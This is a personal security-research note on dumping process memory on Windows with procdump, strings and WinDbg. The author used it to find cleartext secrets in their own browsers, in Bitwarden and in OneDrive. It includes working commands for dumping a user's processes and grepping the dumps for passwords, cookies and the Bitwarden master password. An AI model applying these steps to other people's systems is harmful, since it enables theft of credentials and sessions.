Dumping Process Memory

## Background From my (limited) checking, it seems that whatever the user sees on the screen, must be stored in memory. So dumping the memory should contain all the juicy info. I tried this on [[Extracting Clear-text Passwords from Browsers|browsers (Chrome, Edge, Firefox)]] and also on the Bitwarden password manager - and the sensitive information was found in the dumps. The difficulty is knowing what to search for in the dump files. For example, I knew one of the passwords to look for and indeed it showed up in the Bitwarden dump when I grepped for it, but if I didn't know the password and just knew it was somewhere in the dump, I'm not sure what pattern / techniques to use to eventually pin-point it. However, I did seem to find a pattern for finding the Bitwarden master password: ```bash strings ./* | grep -i 'https://identity.bitwarden.com' -A 1 ``` This results in multiple hits and one of them will show the cleartext password underneath. The password only gets stored in memory after the user has logged in, regardless of whether the vault got locked afterwards. This shows the importance of exiting the Bitwarden process once I've finished using it. ## Windows Get processes for target user: ```powershell Get-Process -IncludeUserName firefox Handles WS(K) CPU(s) Id UserName ProcessName ------- ----- ------ -- -------- ----------- 315 30216 0.08 2532 M-LAPTOP\Maor firefox 361 51232 12.06 4952 M-LAPTOP\Maor firefox 362 219496 11.30 11548 M-LAPTOP\Maor firefox 407 216992 26.72 14772 M-LAPTOP\Maor firefox 1632 530480 2,468.03 16468 M-LAPTOP\Maor firefox 370 83816 0.69 16656 M-LAPTOP\Maor firefox 200 13820 0.14 16812 M-LAPTOP\Maor firefox 315 30520 0.08 16856 M-LAPTOP\Maor firefox 357 130520 74.33 17128 M-LAPTOP\Maor firefox 373 106588 70.86 17328 M-LAPTOP\Maor firefox 5573 507732 1,947.02 17392 M-LAPTOP\Maor firefox 376 76204 83.75 17648 M-LAPTOP\Maor firefox 349 56800 15.50 17656 M-LAPTOP\Maor firefox 379 30636 92.98 18276 M-LAPTOP\Maor firefox 315 30300 0.05 19812 M-LAPTOP\Maor firefox $procs = Get-Process firefox | foreach {$_.Id.ToString()} # $procs = Get-Process -IncludeUserName firefox | foreach {$_.Id.ToString()} ``` Note that `-IncludeUserName` requires admin privileges. Create a memory dump for each process: ```bash foreach ($id in $procs) {procdump.exe -ma "$id" "$id.dmp"} ``` Search for sensitive data: ```powershell foreach ($file in ls .) {strings.exe -n 20 $file | Select-String "password="} foreach ($file in ls .) {strings.exe -n 20 $file | Select-String "set-cookie:"} ``` It's faster to copy the files to Kali and use strings + grep. You can use `grep -a` to have grep treat the binary files as text files, thus speeding up the search. ### WinDbg (+ OneDrive example) [[2022-06-09_Thu]] - I went through the processes running on my machine and saw OneDrive running in the background, so I dumped its memory and started searching through its contents using `grep -ai` and noticed contents of some of my Obsidian notes. After some more searching I understood that because the OneDrive process is always running in the background, and since my Obsidian vault is inside the OneDrive folder, then any time I cause OneDrive to sync something (by modifying a note/creating a new one), then it ends up in memory! I then searched for recent notes that I modified / created and found this one in its entirety in the process' memory - [[Books of Secrets]]: ```text grep -ai 'Note Created: <%+ tp' ./* -A 50 ... ./12316.dmp:Note Created: <%+ tp.file.creation_date() %> ./12316.dmp-Note Last Modified: <%+ tp.file.last_modified_date() %> %%Will render in Reading mode%% ./12316.dmp- ./12316.dmp-# [[Books of Secrets]] ./12316.dmp-*** ./12316.dmp- ./12316.dmp- ./12316.dmp-- [The Secrets of the Reverend Maister Alexis of Piemont](https://www.amazon.com/Secrets-Reverend-Maister-Alexis-Piemont/d p/1527881253) ./12316.dmp-- [Natural Magick](https://www.amazon.com/Natural-Magick-Magiae-naturalis-Neapolitane/dp/1468023152) ./12316.dmp-- [Lady Isabella's Secrets](https://www.amazon.com/Isabellas-Secrets-Virva-Emilia-Auvinen-ebook/dp/B07YQ12C3G) ./12316.dmp- ./12316.dmp-Science and the Secrets of Nature: Books of Secrets in Medieval and Early Modern Culture ./12316.dmp- ./12316.dmp-*** ./12316.dmp-## Footnotes ./12316.dmp-Resources ./12316.dmp- ./12316.dmp-Links to this page ./12316.dmp-```dataview ./12316.dmp-LIST ./12316.dmp-FROM [[#]] ./12316.dmp-WHERE file.path != this.file.path ./12316.dmp-SORT file.name ASC ./12316.dmp-``` ``` [[WinDbg]] can be used to analyze process dumps (and much more). The following command searched through the whole process' heap space for the given text, and shows the addresses: ```text !address -f:heap -c:"s -a %1 %2 \"Secrets of the Reverend Maister Alexis\"" 0000011f`3fbadb9b 53 65 63 72 65 74 73 20-6f 66 20 74 68 65 20 52 Secrets of the 0000011f`47555a90 53 65 63 72 65 74 73 20-6f 66 20 74 68 65 20 52 Secrets of the ``` Playing around with different addresses, I was able to narrow it down using this command to get exactly the notes contents: ```text s -sa 0000011f3fbadab4 0000011f3fbaddd0 0000011f`3fbadab4 "---" 0000011f`3fbadab8 "aliases: []" 0000011f`3fbadac4 "created: "2022-06-09 20:55"" 0000011f`3fbadae4 "tags: []" 0000011f`3fbadaed "---" 0000011f`3fbadaf1 "Note Created: <%+ tp.file.creati" 0000011f`3fbadb11 "on_date() %>" 0000011f`3fbadb1e "Note Last Modified: <%+ tp.file." 0000011f`3fbadb3e "last_modified_date() %> %%Will r" 0000011f`3fbadb5e "ender in Reading mode%%" 0000011f`3fbadb77 "# [[Books of Secrets]]" 0000011f`3fbadb8e "***" 0000011f`3fbadb94 "- [The Secrets of the Reverend M" 0000011f`3fbadbb4 "aister Alexis of Piemont](https:" 0000011f`3fbadbd4 "//www.amazon.com/Secrets-Reveren" 0000011f`3fbadbf4 "d-Maister-Alexis-Piemont/dp/1527" 0000011f`3fbadc14 "881253)" 0000011f`3fbadc1c "- [Natural Magick](https://www.a" 0000011f`3fbadc3c "mazon.com/Natural-Magick-Magiae-" 0000011f`3fbadc5c "naturalis-Neapolitane/dp/1468023" 0000011f`3fbadc7c "152)" 0000011f`3fbadc81 "- [Lady Isabella's Secrets](http" 0000011f`3fbadca1 "s://www.amazon.com/Isabellas-Sec" 0000011f`3fbadcc1 "rets-Virva-Emilia-Auvinen-ebook/" 0000011f`3fbadce1 "dp/B07YQ12C3G)" 0000011f`3fbadcf1 "Science and the Secrets of Natur" 0000011f`3fbadd11 "e: Books of Secrets in Medieval " 0000011f`3fbadd31 "and Early Modern Culture" 0000011f`3fbadd4b "***" 0000011f`3fbadd4f "## Footnotes" 0000011f`3fbadd5c "Resources" 0000011f`3fbadd67 "Links to this page" 0000011f`3fbadd7a "```dataview" 0000011f`3fbadd86 "LIST" 0000011f`3fbadd8b "FROM [[#]]" 0000011f`3fbadd96 "WHERE file.path != this.file.pat" 0000011f`3fbaddb6 "h" 0000011f`3fbaddb8 "SORT file.name ASC" 0000011f`3fbaddcb "```" ``` After authenticating to the OneDrive Vault folder and then locking it, I made another dump and was able to locate the names of the files inside the Vault, but not the file contents. [[2023-03-25_Sat]] - See [[Offensive Debugging]] for more info. ### Pass the Cookie [[Pass the Cookie]] ### Extracting Clear-text Passwords from Browsers [[Extracting Clear-text Passwords from Browsers]] ## Linux ```bash sudo apt-get update sudo apt-get install procdump ``` *** #seedling - "Dumpster diving" through all available computer memory to search for sensitive data that hasn't been overwritten yet. ^ec6972 *** ## Footnotes Resources